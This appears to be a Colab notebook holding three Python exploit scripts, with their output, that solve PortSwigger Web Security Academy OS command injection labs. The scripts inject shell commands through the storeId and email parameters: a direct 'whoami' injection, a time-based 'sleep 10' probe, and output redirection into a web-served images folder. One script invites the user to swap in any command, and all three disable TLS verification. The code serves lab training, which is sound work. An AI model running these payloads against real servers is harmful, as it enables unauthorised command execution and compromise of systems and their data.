<a href="https://colab.research.google.com/github/himuethic/Script-os-command-injection-for-solve-port-swigger-/blob/main/Os_command_iypnb.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

In [ ]:
import requests
import urllib3

# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def run_command(url, command):
    stock_path = '/product/stock'
    command_injection = '1 & ' + command
    params = {'productId': '1', 'storeId': command_injection}

    try:
        r = requests.post(url + stock_path, data=params, verify=False)

        # Print debugging info
        print(f'Payload used: {command_injection}')
        print(f'Requested URL: {url + stock_path}')
        print(f'Status Code: {r.status_code}')
        print(f'Response Headers: {r.headers}')
        print(f'Response Text: {r.text[:500]}')  # Print first 500 chars of response for debugging

        if len(r.text) > 3:
            print("(+) Command injection successful!")
            print("(+) Output of command:")
            print(r.text)
        else:
            print("(-) Command injection failed.")

    except requests.exceptions.RequestException as e:
        print(f'Error: {e}')

def main():
    # Set the URL and command here
    url = 'https://0a24000504710a6986d5b657001b002c.web-security-academy.net'
    command = 'whoami'  # Replace with the desired command

    print("(+) Exploiting command injection...")
    run_command(url, command)

if __name__ == "__main__":
    main()

(+) Exploiting command injection...
Payload used: 1 & whoami
Requested URL: https://0a24000504710a6986d5b657001b002c.web-security-academy.net/product/stock
Status Code: 200
Response Headers: {'Content-Type': 'text/plain; charset=utf-8', 'Set-Cookie': 'session=FYnLGfLWTSiU8h2SevBL75nfzJireRd7; Secure; HttpOnly; SameSite=None', 'X-Frame-Options': 'SAMEORIGIN', 'Content-Encoding': 'gzip', 'Connection': 'close', 'Content-Length': '36'}
Response Text: peter-03fO8c
62

(+) Command injection successful!
(+) Output of command:
peter-03fO8c
62



In [ ]:
import requests
import urllib3
from bs4 import BeautifulSoup

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def get_csrf_token(s, url):
    feedback_path = '/feedback'
    r = s.get(url + feedback_path, verify=False)
    soup = BeautifulSoup(r.text, 'html.parser')
    csrf = soup.find("input")['value']
    return csrf

def check_command_injection(s, url):
    submit_feedback_path = '/feedback/submit'
    command_injection = 'test@test.ca & sleep 10 #'
    csrf_token = get_csrf_token(s, url)
    data = {'csrf': csrf_token, 'name': 'test', 'email': command_injection, 'subject': 'test', 'message': 'test'}
    res = s.post(url + submit_feedback_path, data=data, verify=False)
    if (res.elapsed.total_seconds() >= 10):
        print("(+) Email field vulnerable to time-based command injection!")
    else:
        print("(-) Email field not vulnerable to time-based command injection")

def main():
    # URL of the lab
    url = 'https://0a2c00d703abc4e0808a53220039005e.web-security-academy.net'  # Replace with your actual lab URL
    print("(+) Checking if email parameter is vulnerable to time-based command injection...")

    s = requests.Session()
    check_command_injection(s, url)

if __name__ == "__main__":
    main()

(+) Checking if email parameter is vulnerable to time-based command injection...
(+) Email field vulnerable to time-based command injection!


In [ ]:
import requests
import urllib3
from bs4 import BeautifulSoup

# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def get_csrf_token(s, url):
    feedback_path = '/feedback'
    r = s.get(url + feedback_path, verify=False)
    soup = BeautifulSoup(r.text, 'html.parser')
    csrf = soup.find("input")['value']
    return csrf

def check_command_injection(s, url):
    submit_feedback_path = '/feedback/submit'
    command_injection = 'test@test.ca & whoami > /var/www/images/output2.txt #'  # Updated payload
    csrf_token = get_csrf_token(s, url)
    data = {'csrf': csrf_token, 'name': 'test', 'email': command_injection, 'subject': 'test', 'message': 'test'}
    res = s.post(url + submit_feedback_path, data=data, verify=False)
    if res.status_code == 200:
        print("(+) Command injection attempted. Check /var/www/images/output2.txt on the server for output.")

        output_check_url = url + '/image?filename=output2.txt'
        output_res = s.get(output_check_url, verify=False)
        if output_res.status_code == 200:
            print("(+) Command injection successful! Output of command:")
            print(output_res.text)
        else:
            print("(-) Failed to retrieve the command output.")
    else:
        print("(-) Command injection failed.")

def main():
    # URL of the lab
    url = 'https://0a59008e04a9d66f85f912ab004d0036.web-security-academy.net'  # Replace with your actual lab URL
    print("(+) Checking if email parameter is vulnerable to command injection...")

    s = requests.Session()
    check_command_injection(s, url)

if __name__ == "__main__":
    main()

(+) Checking if email parameter is vulnerable to command injection...
(+) Command injection attempted. Check /var/www/images/output2.txt on the server for output.
(+) Command injection successful! Output of command:
peter-4pdsSg

